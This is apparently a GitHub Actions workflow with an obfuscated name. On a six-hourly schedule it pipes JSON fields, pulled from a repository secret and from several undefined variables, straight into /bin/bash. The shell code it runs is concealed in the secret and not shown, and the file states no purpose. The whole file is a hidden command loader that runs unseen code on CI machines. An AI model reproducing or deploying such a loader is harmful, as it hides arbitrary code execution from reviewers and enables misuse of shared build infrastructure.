name: lidagong0987

on:
  workflow_dispatch:
  schedule:
    - cron: '8 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lidagong0987
        env:
          x5: ${{ secrets.x5 }}
        run: |
          echo $x5 | jq -r .v155 | /bin/bash
          echo $zbs39254 | jq -r .xcc6 | /bin/bash
          echo $c3 | jq -r .rk977 | /bin/bash
          echo $k45 | jq -r .la2 | /bin/bash
          echo $ql69634 | jq -r .jlzm6 | /bin/bash
          echo $nvt8 | jq -r .dgx958 | /bin/bash
          echo $hvmmd15617 | jq -r .jy378 | /bin/bash
          echo $oerbc48 | jq -r .nf78 | /bin/bash
          echo $bafu3 | jq -r .z27 | /bin/bash

